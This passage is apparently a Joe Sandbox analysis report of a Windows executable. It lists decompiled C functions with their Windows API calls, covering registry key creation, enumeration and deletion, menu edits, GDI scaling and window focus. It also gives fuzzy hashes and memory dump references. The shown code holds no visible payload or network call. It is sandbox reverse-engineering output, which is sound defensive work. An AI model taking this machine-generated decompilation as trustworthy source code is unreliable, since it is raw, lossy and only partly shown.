                  					if(RegOpenKeyA(0x80000001,  *(_t82 - 0x11c), _t82 - 0x120) == 0) {
                  						_t60 = RegEnumKeyA( *(_t82 - 0x120), 0, _t82 - 0x118, 0x104);
                  						_t93 = _t60 - 0x103;
                  						if(_t60 == 0x103) {
                  							_push(_t82 - 0x11c);
                  							_push(0x80000001);
                  							E00416900(_t67, _t77, 0, 0x80000001, _t93);
                  						}
                  						RegCloseKey( *(_t82 - 0x120));
                  					}
                  					RegQueryValueA(_t81,  *(_t82 - 0x124), _t82 - 0x118, _t82 - 0x12c);
                  					E004010B0( &(( *(_t82 - 0x124))[0xfffffffffffffff0]), _t77);
                  					E004010B0( &(( *(_t82 - 0x11c))[0xfffffffffffffff0]), _t77);
                  				}
                  				return E00431B87(_t67, 0, _t81);
                  			}

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00416B3A
                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00416C20
                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00416C3D
                  • RegCloseKey.ADVAPI32(?), ref: 00416C5D
                  • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 00416C78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseEnumH_prolog3_OpenQueryValue
                  • String ID: Software\
                  • API String ID: 1666054129-964853688
                  • Opcode ID: 2c69f8e9fb3cf1b68887677988b198adb23b804070d639b6a360ee49bf6eecd0
                  • Instruction ID: 2bc0dbd4b1b81aecab4d277785a25c5ce037b4448173150856faaa691a74c426
                  • Opcode Fuzzy Hash: 2c69f8e9fb3cf1b68887677988b198adb23b804070d639b6a360ee49bf6eecd0
                  • Instruction Fuzzy Hash: 29418F718001289BCF21EB65CC45ADEB7B9AF49314F1001EAF145E22A1DB389AD1CF99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E004146D0(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t31;
                  				char* _t37;
                  				char* _t46;
                  				intOrPtr _t51;
                  				void* _t61;
                  				char* _t64;
                  				signed int _t72;
                  				void* _t74;
                  
                  				_t61 = __edx;
                  				_t53 = __ecx;
                  				_push(4);
                  				E00431A9B(E0044C66E, __ebx, __edi, __esi);
                  				_t51 = __ecx;
                  				 *((intOrPtr*)(_t74 - 0x10)) = __ecx;
                  				_t76 =  *(_t74 + 0xc) & 0x00000004;
                  				 *((intOrPtr*)(__ecx + 0xc8)) = 1;
                  				_t31 = 0x80c83b00;
                  				if(( *(_t74 + 0xc) & 0x00000004) != 0) {
                  					_t31 = 0x80c83300;
                  				}
                  				if(E00424F26(_t53, _t76, 0, 0, 0x44f0f5, _t31, 0x46279c,  *((intOrPtr*)(_t74 + 8)), 0) != 0) {
                  					asm("sbb esi, esi");
                  					_t72 = ( ~( *(_t74 + 0xc) & 0x00005000) & 0xfffff000) + 0x00002000 |  *(_t74 + 0xc) & 0x00000040;
                  					_t64 = E004133BB(_t51, 0);
                  					__eflags = _t64;
                  					if(_t64 != 0) {
                  						DeleteMenu(_t64[4], 0xf000, 0);
                  						DeleteMenu(_t64[4], 0xf020, 0);
                  						DeleteMenu(_t64[4], 0xf030, 0);
                  						DeleteMenu(_t64[4], 0xf120, 0);
                  						E004014C0(_t74 + 0xc, _t61);
                  						 *(_t74 - 4) =  *(_t74 - 4) & 0x00000000;
                  						_t46 = E00402720(_t74 + 0xc, 0xf011);
                  						__eflags = _t46;
                  						if(_t46 != 0) {
                  							DeleteMenu(_t64[4], 0xf060, 0);
                  							AppendMenuA(_t64[4], 0, 0xf060,  *(_t74 + 0xc));
                  						}
                  						 *(_t74 - 4) =  *(_t74 - 4) | 0xffffffff;
                  						__eflags =  &(( *(_t74 + 0xc))[0xfffffffffffffff0]);
                  						E004010B0( &(( *(_t74 + 0xc))[0xfffffffffffffff0]), _t61);
                  						_t51 =  *((intOrPtr*)(_t74 - 0x10));
                  					}
                  					_t65 = _t51 + 0xf8;
                  					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t51 + 0xf8)) + 0x17c))( *((intOrPtr*)(_t74 + 8)), _t72 | 0x50000000, 0xe81f);
                  					__eflags = _t37;
                  					if(_t37 != 0) {
                  						E004133D6(_t65, _t51);
                  						_t37 = 1;
                  					}
                  					 *(_t51 + 0xc8) =  *(_t51 + 0xc8) & 0x00000000;
                  					goto L4;
                  				} else {
                  					 *(_t51 + 0xc8) = 0;
                  					L4:
                  					return E00431B73(_t37);
                  				}
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004146D7
                    • Part of subcall function 004133BB: GetSystemMenu.USER32(?,?), ref: 004133C6
                  • DeleteMenu.USER32(?,0000F000,00000000), ref: 00414767
                  • DeleteMenu.USER32(?,0000F020,00000000), ref: 00414773
                  • DeleteMenu.USER32(?,0000F030,00000000), ref: 0041477F
                  • DeleteMenu.USER32(?,0000F120,00000000), ref: 0041478B
                  • DeleteMenu.USER32(?,0000F060,00000000,0000F011), ref: 004147B4
                  • AppendMenuA.USER32 ref: 004147C3
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$Delete$AppendH_prolog3System
                  • String ID:
                  • API String ID: 1427010815-0
                  • Opcode ID: aff83d87a85b773f964931b9adbbd999ef37a797d0e26fff4b4aa0b383d6ff58
                  • Instruction ID: fa170293c447da0cf328da5eff8f5daf512e33c4efadb7408d9be9ec5d0d8651
                  • Opcode Fuzzy Hash: aff83d87a85b773f964931b9adbbd999ef37a797d0e26fff4b4aa0b383d6ff58
                  • Instruction Fuzzy Hash: 8331E671640606BBEB205F21CC86FB97660AF44754F108239FA296F2E1DB78AC50D75C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0042DA25(void* __ebx, int __ecx, void* __edi, intOrPtr _a4) {
                  				struct HDC__* _t26;
                  				struct tagSIZE* _t39;
                  				struct tagSIZE* _t47;
                  				int _t50;
                  				int _t51;
                  				int _t52;
                  				void* _t54;
                  
                  				_t41 = __ecx;
                  				_t52 = __ecx;
                  				if(_a4 != 0) {
                  					_t39 = __ecx + 0x38;
                  					GetViewportExtEx( *(__ecx + 8), _t39);
                  					_t47 = __ecx + 0x30;
                  					GetWindowExtEx( *(__ecx + 8), _t47);
                  					_t54 = _t47->cx - 0xffffc000;
                  					while(_t54 > 0) {
                  						if(_t47->cx < 0x4000) {
                  							_t41 = _t39->cx;
                  							if(_t41 > 0xffffc000 && _t41 < 0x4000) {
                  								_t41 = _t41 + _t41;
                  								_t47->cx = _t47->cx + _t47->cx;
                  								_t39->cx = _t41;
                  								continue;
                  							}
                  						}
                  						break;
                  					}
                  					if( *(_t52 + 0x34) > 0xffffc000) {
                  						while(1) {
                  							_t50 =  *(_t52 + 0x34);
                  							if(_t50 >= 0x4000) {
                  								goto L12;
                  							}
                  							_t41 =  *(_t52 + 0x3c);
                  							if(_t41 > 0xffffc000 && _t41 < 0x4000) {
                  								_t51 = _t50 + _t50;
                  								_t41 = _t41 + _t41;
                  								 *(_t52 + 0x34) = _t51;
                  								 *(_t52 + 0x3c) = _t41;
                  								if(_t51 > 0xffffc000) {
                  									continue;
                  								}
                  							}
                  							goto L12;
                  						}
                  					}
                  					L12:
                  					_t39->cx = E0042CB79(_t41, _t39->cx,  *((intOrPtr*)(_t52 + 0x10)),  *0x466528,  *((intOrPtr*)(_t52 + 0x14)), GetDeviceCaps( *(_t52 + 8), 0x58));
                  					 *(_t52 + 0x3c) = E0042CB79(_t41,  *(_t52 + 0x3c),  *((intOrPtr*)(_t52 + 0x10)),  *0x46652c,  *((intOrPtr*)(_t52 + 0x14)), GetDeviceCaps( *(_t52 + 8), 0x5a));
                  				}
                  				_t26 =  *(_t52 + 4);
                  				if(_t26 != 0) {
                  					SetMapMode(_t26, 8);
                  					SetWindowExtEx( *(_t52 + 4),  *(_t52 + 0x30),  *(_t52 + 0x34), 0);
                  					SetViewportExtEx( *(_t52 + 4),  *(_t52 + 0x38),  *(_t52 + 0x3c), 0);
                  					return E0042D94D(_t52);
                  				}
                  				return _t26;
                  			}











                  APIs
                  • GetViewportExtEx.GDI32(00000000,?), ref: 0042DA40
                  • GetWindowExtEx.GDI32(00000000,?), ref: 0042DA4D
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0042DAAD
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042DACA
                  • SetMapMode.GDI32(?,00000008), ref: 0042DAF0
                  • SetWindowExtEx.GDI32(?,?,?,00000000), ref: 0042DB01
                  • SetViewportExtEx.GDI32(?,?,?,00000000), ref: 0042DB12
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CapsDeviceViewportWindow$Mode
                  • String ID:
                  • API String ID: 396987064-0
                  • Opcode ID: d440de2a9390ac2520f05333e535efbc71bd750e38a2d884d07320e4bff5a10b
                  • Instruction ID: e6f6d9ad73a54bed525db6a91c032bac503609f285183dbfdb4a3afa3b566461
                  • Opcode Fuzzy Hash: d440de2a9390ac2520f05333e535efbc71bd750e38a2d884d07320e4bff5a10b
                  • Instruction Fuzzy Hash: 4D317232600A11EFDB315F56ED41E1ABBF6FF98700794982DE15682A60D775B850CF04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E00416900(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				long _t38;
                  				void* _t51;
                  				void* _t54;
                  				signed int _t57;
                  				void* _t67;
                  				void* _t71;
                  				void* _t73;
                  				void* _t76;
                  
                  				_t76 = __eflags;
                  				_t67 = __edx;
                  				_t57 = __ebx;
                  				_push(0x124);
                  				E00431B3A(E0044B41E, __ebx, __edi, __esi);
                  				_t71 =  *(_t73 + 8);
                  				 *(_t73 - 0x12c) = _t71;
                  				E00405562(_t73 - 0x124, _t76,  *((intOrPtr*)(_t73 + 0xc)));
                  				 *((intOrPtr*)(_t73 - 4)) = 0;
                  				if(_t71 == 0x80000000) {
                  					_t51 = E0041EC3D();
                  					_t78 = _t51 - 1;
                  					if(_t51 == 1) {
                  						_push(_t73 - 0x124);
                  						_push("Software\\Classes\\");
                  						_push(_t73 - 0x120);
                  						_t54 = E004168AB(__ebx, 0, _t71, _t78);
                  						 *((char*)(_t73 - 4)) = 1;
                  						E004056C2(__ebx, _t73 - 0x124, _t54);
                  						 *((char*)(_t73 - 4)) = 0;
                  						E004010B0( *((intOrPtr*)(_t73 - 0x120)) + 0xfffffff0, _t67);
                  						 *(_t73 - 0x12c) = 0x80000001;
                  					}
                  				}
                  				_t38 = RegOpenKeyA( *(_t73 - 0x12c),  *(_t73 - 0x124), _t73 - 0x128);
                  				_t72 = _t38;
                  				if(_t38 != 0) {
                  					L11:
                  					__eflags =  &(( *(_t73 - 0x124))[0xfffffffffffffff0]);
                  					E004010B0( &(( *(_t73 - 0x124))[0xfffffffffffffff0]), _t67);
                  					return E00431B96(_t57, 0, _t72);
                  				} else {
                  					while(1) {
                  						_t72 = RegEnumKeyA( *(_t73 - 0x128), 0, _t73 - 0x11c, 0x104);
                  						_t81 = _t72;
                  						if(_t72 != 0) {
                  							break;
                  						}
                  						_push(_t73 - 0x11c);
                  						 *((char*)(_t73 - 4)) = 2;
                  						E00406039(_t57, _t73 - 0x120, _t67, 0, _t72, _t81);
                  						 *((char*)(_t73 - 4)) = 3;
                  						_t72 = E00416900(_t57, _t67, 0, _t72, _t81,  *(_t73 - 0x128), _t73 - 0x120);
                  						_t57 = _t57 & 0xffffff00 | _t72 != 0x00000000;
                  						 *((char*)(_t73 - 4)) = 2;
                  						E004010B0( *((intOrPtr*)(_t73 - 0x120)) + 0xfffffff0, _t67);
                  						if(_t57 != 0) {
                  							break;
                  						}
                  						 *((intOrPtr*)(_t73 - 4)) = 0;
                  					}
                  					__eflags = _t72 - 0x103;
                  					if(_t72 == 0x103) {
                  						L9:
                  						_t72 = RegDeleteKeyA( *(_t73 - 0x12c),  *(_t73 - 0x124));
                  						L10:
                  						RegCloseKey( *(_t73 - 0x128));
                  						goto L11;
                  					}
                  					__eflags = _t72 - 0x3f2;
                  					if(_t72 != 0x3f2) {
                  						goto L10;
                  					}
                  					goto L9;
                  				}
                  			}












                  APIs
                  • __EH_prolog3_catch_GS.LIBCMT ref: 0041690A
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00416998
                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 004169BB
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EnumH_prolog3H_prolog3_catch_Open
                  • String ID: Software\Classes\
                  • API String ID: 3518408925-1121929649
                  • Opcode ID: e3c2d5f4c53faedf68658fe16a846a1c51aaa5f659ad65bbad251e652c178414
                  • Instruction ID: 9bc735b9683b0f1466790649354c91e8bae961b69db05001f0a35a48de0ea7d3
                  • Opcode Fuzzy Hash: e3c2d5f4c53faedf68658fe16a846a1c51aaa5f659ad65bbad251e652c178414
                  • Instruction Fuzzy Hash: D931A331C001289BCF21EB64CD40BDDB7B4AF09350F0141EAE99973291DA345FD48F95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E004052B0(void* __ebx, intOrPtr* __ecx, intOrPtr _a4) {
                  				signed int _v8;
                  				char _v28;
                  				char _v544;
                  				int _v548;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t22;
                  				intOrPtr* _t24;
                  				intOrPtr _t29;
                  				intOrPtr _t33;
                  				int _t39;
                  				void* _t44;
                  				void* _t55;
                  				intOrPtr* _t56;
                  				void* _t57;
                  				void* _t58;
                  				void* _t60;
                  				signed int _t63;
                  
                  				_t44 = __ebx;
                  				_t61 = _t63;
                  				_t22 =  *0x463404; // 0x38a11573
                  				_v8 = _t22 ^ _t63;
                  				_t56 = __ecx;
                  				_t24 = E0040474E(__ecx);
                  				_t54 =  *_t24;
                  				 *((intOrPtr*)( *_t24 + 0x178))(_a4, _t55, _t60);
                  				if((E00412B38(__ecx) & 0x00008000) != 0) {
                  					_t51 = __ecx;
                  					_t26 =  *((intOrPtr*)( *__ecx + 0x144))();
                  					if(_a4 != 0) {
                  						_push(_t58);
                  						_push(0xffffffff);
                  						if(_t26 != 0) {
                  							_t29 =  *((intOrPtr*)(_t26 + 0x20));
                  						} else {
                  							_t29 =  *((intOrPtr*)(__ecx + 0xc4));
                  						}
                  						_push(_t29);
                  						_push(0x204);
                  						_push( &_v544);
                  						E004048C1(_t44, _t51, _t56, 0x204, E00431784());
                  						_t33 =  *((intOrPtr*)(_t56 + 0x58));
                  						if(_t33 > 0) {
                  							swprintf( &_v28, 0x11, ":%d", _t33, _t44);
                  							_v548 = lstrlenA( &_v28);
                  							_t39 = lstrlenA( &_v544);
                  							_t51 = _v548 + _t39;
                  							_pop(_t44);
                  							if(_v548 + _t39 < 0x204) {
                  								E004048C1(_t44, _t51, _t56, 0x204, E004317A1(_t54,  &_v544, 0x204,  &_v28));
                  							}
                  						}
                  						_t26 = E0041FC5A(_t51, _t54,  *((intOrPtr*)(_t56 + 0x20)),  &_v544);
                  						_pop(_t58);
                  					}
                  				}
                  				_pop(_t57);
                  				return E00430650(_t26, _t44, _v8 ^ _t61, _t54, _t57, _t58);
                  			}























                  APIs
                    • Part of subcall function 0040474E: GetParent.USER32(?), ref: 0040475A
                    • Part of subcall function 0040474E: GetParent.USER32(00000000), ref: 0040475D
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • __cftof.LIBCMT ref: 00405320
                  • swprintf.LIBCMT ref: 00405342
                  • lstrlenA.KERNEL32(?), ref: 00405354
                  • lstrlenA.KERNEL32(?), ref: 00405363
                  • _strcat_s.LIBCMT ref: 0040537E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Parentlstrlen$LongWindow__cftof_strcat_sswprintf
                  • String ID: :%d
                  • API String ID: 1631328139-1955712242
                  • Opcode ID: a3ed0814bc3c88985df354d893b6ce983353cf69c6df732c2c712562beb77c94
                  • Instruction ID: e46ddc5a9b823e7d646c18db364a7f4297011ab93b4b5035d7968b8aff5587db
                  • Opcode Fuzzy Hash: a3ed0814bc3c88985df354d893b6ce983353cf69c6df732c2c712562beb77c94
                  • Instruction Fuzzy Hash: A2219471A00208ABDB14EB65CC89EEFB76CEF48354F10057AF90597292DB78DD458B98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E0040A4A9(intOrPtr* __ecx, long _a4) {
                  				void* __ebx;
                  				void* _t26;
                  				signed int _t27;
                  				long _t40;
                  				signed int _t43;
                  				intOrPtr* _t54;
                  
                  				_t47 = __ecx;
                  				_t43 = _a4;
                  				_t54 = __ecx;
                  				if(_t43 != 0 && ( *(__ecx + 0x3c) & 0x00000004) != 0) {
                  					E00412C76(__ecx, 0);
                  					return SetFocus(0);
                  				}
                  				_t26 = E0040EE3C(_t43, _t47, GetParent( *(_t54 + 0x20)));
                  				if(_t26 == 0) {
                  					L5:
                  					if(_t43 != 0) {
                  						_t27 =  *(_t54 + 0x3c);
                  						if(_t27 < 0) {
                  							 *(_t54 + 0x3c) = _t27 & 0xffffff7f;
                  							 *((intOrPtr*)( *_t54 + 0x104))();
                  							_a4 =  *(_t54 + 0x20);
                  							if(GetActiveWindow() == _a4) {
                  								SendMessageA(_a4, 6, 1, 0);
                  							}
                  						}
                  						if(( *(_t54 + 0x3c) & 0x00000020) != 0) {
                  							SendMessageA( *(_t54 + 0x20), 0x86, 1, 0);
                  						}
                  					} else {
                  						if( *((intOrPtr*)(_t54 + 0xb8)) == 0) {
                  							 *(_t54 + 0x3c) =  *(_t54 + 0x3c) | 0x00000080;
                  							 *((intOrPtr*)( *_t54 + 0x100))();
                  						}
                  					}
                  					asm("sbb ebx, ebx");
                  					return E00408A69(_t54, ( ~_t43 & 0xfffffff0) + 0x20);
                  				} else {
                  					_a4 = 0;
                  					GetWindowThreadProcessId( *(_t26 + 0x20),  &_a4);
                  					_t40 = GetCurrentProcessId();
                  					if(_t40 == _a4) {
                  						return _t40;
                  					}
                  					goto L5;
                  				}
                  			}










                  APIs
                  • SetFocus.USER32(00000000,00000000), ref: 0040A4C9
                  • GetParent.USER32(?), ref: 0040A4D7
                  • GetWindowThreadProcessId.USER32(?,?), ref: 0040A4F2
                  • GetCurrentProcessId.KERNEL32 ref: 0040A4F8
                  • GetActiveWindow.USER32 ref: 0040A54B
                  • SendMessageA.USER32(?,00000006,00000001,00000000), ref: 0040A55F
                  • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 0040A573
                    • Part of subcall function 00412C76: EnableWindow.USER32(?,?), ref: 00412C87
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
                  • String ID:
                  • API String ID: 2169720751-0
                  • Opcode ID: dfdcc4aceaedbd86c3665efdada2bbe5d0073950082cda493ab0cb21491c4667
                  • Instruction ID: 0560ffd8090ea321ddfb3cc0bc89d5341b088f6257bcd32caec06168c9843b40
                  • Opcode Fuzzy Hash: dfdcc4aceaedbd86c3665efdada2bbe5d0073950082cda493ab0cb21491c4667
                  • Instruction Fuzzy Hash: E621F171200700BFCB219F25CCC8F6E7BA4BF44740F24452AF589A72E0D7B8B8508B5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00440043() {
                  				intOrPtr _t5;
                  				intOrPtr _t6;
                  				intOrPtr _t10;
                  				void* _t12;
                  				intOrPtr _t15;
                  				intOrPtr* _t16;
                  				signed int _t19;
                  				signed int _t20;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  
                  				_t5 =  *0x468660;
                  				_t26 = 0x14;
                  				if(_t5 != 0) {
                  					if(_t5 < _t26) {
                  						_t5 = _t26;
                  						goto L4;
                  					}
                  				} else {
                  					_t5 = 0x200;
                  					L4:
                  					 *0x468660 = _t5;
                  				}
                  				_t6 = E004381D6(_t5, 4);
                  				 *0x467648 = _t6;
                  				if(_t6 != 0) {
                  					L8:
                  					_t19 = 0;
                  					_t15 = 0x463fd0;
                  					while(1) {
                  						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                  						_t15 = _t15 + 0x20;
                  						_t19 = _t19 + 4;
                  						if(_t15 >= 0x464250) {
                  							break;
                  						}
                  						_t6 =  *0x467648; // 0x24320d0
                  					}
                  					_t27 = 0xfffffffe;
                  					_t20 = 0;
                  					_t16 = 0x463fe0;
                  					do {
                  						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x468680 + (_t20 >> 5) * 4))));
                  						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                  							 *_t16 = _t27;
                  						}
                  						_t16 = _t16 + 0x20;
                  						_t20 = _t20 + 1;
                  					} while (_t16 < 0x464040);
                  					return 0;
                  				} else {
                  					 *0x468660 = _t26;
                  					_t6 = E004381D6(_t26, 4);
                  					 *0x467648 = _t6;
                  					if(_t6 != 0) {
                  						goto L8;
                  					} else {
                  						_t12 = 0x1a;
                  						return _t12;
                  					}
                  				}
                  			}














                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __calloc_crt
                  • String ID: @@F$PBF$`vF$?F
                  • API String ID: 3494438863-1129309999
                  • Opcode ID: 1a2e1c73d2f0b5ee1c020fbac76cde2fdd918bf510956deff6eadb29a4ec2292
                  • Instruction ID: a5c93d0391fce3b3b5f1e76609cc71b27c325a532c4fd8429ec35ff82f20e995
                  • Opcode Fuzzy Hash: 1a2e1c73d2f0b5ee1c020fbac76cde2fdd918bf510956deff6eadb29a4ec2292
                  • Instruction Fuzzy Hash: 7C1191317097115BF7288E2DBC50B662391A785728F24423FE715DA3A4FAB8D891868E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00426499(intOrPtr __ecx) {
                  				void* _v8;
                  				void* _v12;
                  				void* _v16;
                  				int _v20;
                  				intOrPtr _v24;
                  				intOrPtr _t32;
                  
                  				_t32 = __ecx;
                  				_v24 = __ecx;
                  				_v16 = 0;
                  				_v8 = 0;
                  				_v12 = 0;
                  				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                  					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                  				}
                  				if(_v8 != 0) {
                  					RegCloseKey(_v8);
                  				}
                  				if(_v12 != 0) {
                  					RegCloseKey(_v12);
                  				}
                  				return _v16;
                  			}










                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 004264C9
                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004264EC
                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00426508
                  • RegCloseKey.ADVAPI32(?), ref: 00426518
                  • RegCloseKey.ADVAPI32(?), ref: 00426522
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseCreate$Open
                  • String ID: software
                  • API String ID: 1740278721-2010147023
                  • Opcode ID: baa5dd68dee05fadf222446a8f3323f9c01591b1d0c43eda07168c0e41c926bb
                  • Instruction ID: 3f12b4e016f44e42d78fa2a8c8e700cc1342d59c6eca5ba0814baf6782e48a0c
                  • Opcode Fuzzy Hash: baa5dd68dee05fadf222446a8f3323f9c01591b1d0c43eda07168c0e41c926bb
                  • Instruction Fuzzy Hash: C411E676D00128BB8B21DF9AEC88CDFBFBCEF89744B5100AAB504A2115D6719A44DBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 62%
                  			E00401000(intOrPtr* _a4) {
                  				void* _t21;
                  				intOrPtr* _t38;
                  				void* _t42;
                  
                  				_t38 = _a4;
                  				if(WaitForSingleObject( *(_t38 + 0x10), 0xffffffff) == 0) {
                  					while(WaitForSingleObject( *(_t38 + 0x18), 0) != 0) {
                  						ResetEvent( *(_t38 + 0x14));
                  						_push( *((intOrPtr*)(_t38 + 0x24)));
                  						_push( *((intOrPtr*)(_t38 + 0x20)));
                  						_push(_t38);
                  						_push(_t38 + 8);
                  						_push( *((intOrPtr*)(_t38 + 4)));
                  						_push( *_t38);
                  						_t21 = E004042A0( *_t38);
                  						_t42 = _t42 + 0x18;
                  						SetEvent( *(_t38 + 0x14));
                  						if(_t21 != 0) {
                  							PostMessageA( *(_t38 + 0xc), 0x402, 0, 0);
                  							if(WaitForSingleObject( *(_t38 + 0x10), 0xffffffff) == 0) {
                  								continue;
                  							}
                  						}
                  						break;
                  					}
                  				}
                  				SetEvent( *(_t38 + 0x1c));
                  				return 0;
                  			}







                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401012
                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 00401026
                  • ResetEvent.KERNEL32(?), ref: 00401030
                    • Part of subcall function 004042A0: WaitForSingleObject.KERNEL32(?,00000000,?,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042CA
